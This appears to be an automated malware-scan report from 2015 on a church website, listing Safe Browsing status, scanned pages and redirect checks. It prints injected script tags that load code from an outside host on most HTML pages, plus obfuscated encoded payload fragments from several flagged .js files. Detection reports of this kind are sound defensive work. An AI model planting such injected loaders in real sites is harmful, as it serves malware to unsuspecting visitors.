Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mtmoriahcogic.org
Result: Google has marked this website as suspicious; visiting it may harm your computer.
Details are available here.
Result: Google has marked this website as suspicious; visiting it may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://mtmoriahcogic.org/ | 200 OK Content-Length: 10533 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=21622358"></script> | ||
http://mtmoriahcogic.org/js/jquery-1.7.1.min.js | 200 OK Content-Length: 98158 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(a,b){function cu(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cr(a){if(!cg[a]){var b=c.body,d=f("<"+a+">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){ch||(ch=c.createElement("iframe"),ch.frameBorder=ch.width=ch.height=0),b.appendChild(ch);if(!ci||!ch.createElement)ci=(ch.contentWindow||ch.contentDocument).document,ci.write((c.compatMode==="CSS1Compat"?"<!doctype html>":"")+"<html><body>"),ci.close();d=c … [excerpt cut off here; the part shown looks like the ordinary start of minified jQuery, so the flagged code is presumably further into the file] Antivirus reports:
| ||
http://mtmoriahcogic.org/js/cufon-yui.js | 200 OK Content-Length: 2733 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) 7:1f:17:6a:6b:58:69:6b:17:34:34:17:24:28:17:20:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:6d:58:69:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:19:32:19:23:17:63:5c:65:17:20:32:4:1:17:60:5d:17:1f:17:5c:65:5b:17:34:34:17:24:28:17:20:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:63:5c:65:5e:6b:5f:32:4:1:17:69:5c:6b:6c:69:65:17:6c:65:5c:6a:5a:58:67:5c:1f:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69: /*/a9a007*/ Antivirus reports:
| ||
http://mtmoriahcogic.org/js/cufon-replace.js | 200 OK Content-Length: 6733 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) Cufon.replace('.slogan-top,.gallery-slogan span', { fontFamily: 'Beautiful ES'}); Cufon.replace('.sf-menu > li > a ', { fontFamily: 'OptimusPrincepsSemiBold',textShadow:'1px 1px #19100a',hover:true}); Cufon.replace('.soc span ', { fontFamily: 'OptimusPrincepsSemiBold'}); Cufon.replace('.gallery-slogan strong ', { fontFamily: 'OptimusPrincepsSemiBold',letterSpacing:'-7px'}); Antivirus reports:
| ||
http://mtmoriahcogic.org/js/Beautiful_ES_italic_400.font.js | 200 OK Content-Length: 41237 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) Cufon.registerFont({"w":86,"face":{"font-family":"Beautiful ES","font-weight":400,"font-style":"italic","font-stretch":"normal","units-per-em":"360","panose-1":"2 0 5 3 8 0 0 9 0 2","ascent":"288","descent":"-72","x-height":"3","cap-height":"6","bbox":"-167.381 -270 365.782 146.271","underline-thickness":"10.8","underline-position":"-37.8","slope":"-39","unicode-range":"U+0020-U+007E"},"glyphs":{" ":{"w":55},"!":{"d":"28,-25v47,-44,99,-96,82,-97v-9,0,-17,3,-22,11xm30,-13v-10,-10,-29,5,-19,16v7,1 … /*/a9a007*/ [the excerpt appears to skip from the font data to this comment marker, which also appears in several of the other flagged .js excerpts on this page] Antivirus reports:
| ||
http://mtmoriahcogic.org/js/OptimusPrincepsSemiBold_600.font.js | 200 OK Content-Length: 38218 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) Cufon.registerFont({"w":85,"face":{"font-family":"OptimusPrincepsSemiBold","font-weight":600,"font-stretch":"normal","units-per-em":"360","panose-1":"2 0 8 5 6 0 0 2 0 4","ascent":"288","descent":"-72","bbox":"0.745166 -297.207 519 91.0637","underline-thickness":"7.2","underline-position":"-44.28","unicode-range":"U+0020-U+007D"},"glyphs":{" ":{"w":87},"!":{"d":"43,-247v-62,-7,-32,128,-21,180v2,2,8,1,8,-2xm7,-37v-2,24,36,27,37,4v2,-21,-37,-29,-37,-4","w":50},"\"":{"d":"72,-192r6,-81v0,-9,-6,-16, /*/a9a007*/ Antivirus reports:
| ||
http://mtmoriahcogic.org/js/script.js | 200 OK Content-Length: 3847 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) 2d:27:27:27:27:27:21:29:2b:21:65:3b:58:70:6a:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:17:34:17:5a:66:66:62:60:5c:45:58:64:5c:22:19:34:19:22:5c:6a:5a:58:67:5c:1f:5a:66:66:62:60:5c:4d:58:63:6c:5c:20:4:1:17:22:17:19:32:5c:6f:67:60:69:5c:6a:34:19:17:22:17:5c:6f:67:60:69:5c:25:6b:66:3e:44:4b:4a:6b:69:60:65:5e:1f:20:17:22:17:1f:1f:67:58:6b:5f:20:17:36:17:19:32:17:67:58:6b:5f:34:19:17:22:17:67:58:6b:5f:17:31:17:19:19:20:32:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:3e:5c:6b:3a:66:66:62:60:5 /*/a9a007*/ Antivirus reports:
| ||
http://mtmoriahcogic.org/index.html | 200 OK Content-Length: 10533 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=21622358"></script> | ||
http://mtmoriahcogic.org/index-1.html | 200 OK Content-Length: 9637 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=21622342"></script> | ||
http://mtmoriahcogic.org/index-2.html | 200 OK Content-Length: 9025 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=21622344"></script> | ||
http://mtmoriahcogic.org/index-7.html | 200 OK Content-Length: 8047 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=21622354"></script> | ||
http://mtmoriahcogic.org/more.html | 200 OK Content-Length: 9456 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=21622362"></script> | ||
http://mtmoriahcogic.org/index-3.html | 200 OK Content-Length: 5527 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=21622346"></script> | ||
http://mtmoriahcogic.org/index-4.html | 200 OK Content-Length: 8137 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=21622348"></script> | ||
http://mtmoriahcogic.org/index-5.html | 200 OK Content-Length: 9256 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=21622350"></script> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mtmoriahcogic.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 24 Feb 2015 11:05:31 GMT
Accept-Ranges: bytes
ETag: "e2253e8-2925-50e7c7c25fd84"
Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 10533
Content-Type: text/html
Last-Modified: Sat, 07 Feb 2015 09:51:45 GMT
...10533 bytes of data.
GET / HTTP/1.1
Host: mtmoriahcogic.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 24 Feb 2015 11:05:31 GMT
Accept-Ranges: bytes
ETag: "e2253e8-2925-50e7c7c25fd84"
Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 10533
Content-Type: text/html
Last-Modified: Sat, 07 Feb 2015 09:51:45 GMT
...10533 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mtmoriahcogic.org
Referer: http://www.google.com/search?q=mtmoriahcogic.org
Result:
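The result is similar to the first query. No suspicious redirects were found. Note that this check covers only HTTP-level redirects for the two requests shown; the 10533-byte body returned for / has the same Content-Length as the copy flagged above as suspicious for the external script tag it contains.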
GET / HTTP/1.1
Host: mtmoriahcogic.org
Referer: http://www.google.com/search?q=mtmoriahcogic.org
Result:
The result is similar to the first query. There are no suspicious redirects found.